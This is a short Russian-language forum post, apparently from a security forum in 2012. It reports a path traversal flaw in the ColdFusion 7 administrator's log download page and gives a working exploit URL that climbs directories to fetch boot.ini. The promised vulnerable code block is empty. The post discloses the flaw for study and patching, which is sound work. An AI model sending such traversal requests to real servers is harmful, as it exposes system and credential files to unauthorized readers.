Показать сообщение отдельно

  #8  
Старый 24.09.2012, 05:19
Konqi
Постоянный
Регистрация: 24.06.2009
Сообщений: 542
Провел на форуме:
2101094

Репутация: 672


По умолчанию

еще одна "бага" если можно так, в админке в секции логирования, вместо логов можно скачать к себе любой файл из ФС

http://www.site.com/cfide/administrator/logging/downloadlog.cfm?logfile=../../../../boot.ini

никакой проверки нету, уязвимость присувствует в версии 7, в других версиях не проверял, если получится проверить отпишусь

уязвимый код

Код:

видно что переменная #url.log# никак не проверяется
 
Ответить с цитированием